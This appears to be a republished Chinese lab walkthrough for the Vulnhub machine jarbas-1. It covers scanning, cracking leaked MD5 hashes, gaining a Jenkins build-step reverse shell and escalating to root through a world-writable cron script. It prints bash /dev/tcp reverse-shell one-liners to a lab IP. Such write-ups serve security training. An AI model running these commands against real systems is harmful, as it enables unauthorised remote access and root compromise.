文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

【甄选靶场】Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)

2023-08-31 16:57

关注

Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2023年1月18日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路


本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


信息收集

首先进行存活主机的探测

nmap -sP 192.168.247.0/24

找到了.146的主机
在这里插入图片描述而后进行服务探测

nmap -p- --min-rate 10000 -A 192.168.247.14622/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)|_http-title: Jarbas - O Seu Mordomo Virtual!| http-methods: |_  Potentially risky methods: TRACE|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.163306/tcp open  mysql   MariaDB (unauthorized)8080/tcp open  http    Jetty 9.4.z-SNAPSHOT|_http-title: Site doesn't have a title (text/html;charset=utf-8).| http-robots.txt: 1 disallowed entry |_/|_http-server-header: Jetty(9.4.z-SNAPSHOT)

总结一下得知的信息如下

端口 22:OpenSSH 7.4端口 80:Apache httpd 2.4.63306 端口:mysql (MariaDB)端口 8080:http(Jetty 9.4.z-SNAPSHOT) 

对于80端口,没有现成的exp,并且谷歌能搜的东西相对较少,所以不考虑exp利用,而后就是3306,无法外部连接,所以同样不管
ssh版本没有可利用的exp,8080端口存在用户登录
我将尝试弱口令无效,所以开始目录爆破

gobuster dir -u http://192.168.247.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php -t 10

在这里插入图片描述
得到了access.html
出现了很多的md5,进行破解

在这里插入图片描述得到md5/明文凭据如下

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

tiago: italia99trindade: mariannaeder: vipsu

最终eder: vipsu可以成功登陆

jenkins

这是一个类github的项目管理,通常来说,根据已经遇到的类github的中间件,总结出可能漏洞点:直接的命令执行,对现存的任务进行分支合并,如果是建站的任务,那么可以分支合并来避开主线无权修改的问题从而分支合并一个shell,而后达成反弹shell

那么我将按照常规的寻找步骤,看看新建一个任务,我会注意观察各个选项,看能不能执行命令(寻找过程就不放图了,直接放最终的成功的路径)
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述此处可以执行命令

 /bin/bash -i >& /dev/tcp/192.168.247.130/4444 0>&1 

在这里插入图片描述而后点击立即构建
在这里插入图片描述本地接受到

提权

我首先利用了常规的手工枚举方法,我找到了计划任务,并且细致查看之后,发现他是全局可写,并且是root权限,那么我将写一个bash命令而后等待连接

cat /etc/crontab

在这里插入图片描述
在这里插入图片描述写入一个命令

echo "/bin/bash -i >& /dev/tcp/192.168.247.130/4443 0>&1" >> /etc/script/CleaningScript.sh 

本地获得root权限
在这里插入图片描述

来源地址:https://blog.csdn.net/weixin_65527369/article/details/128728330

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯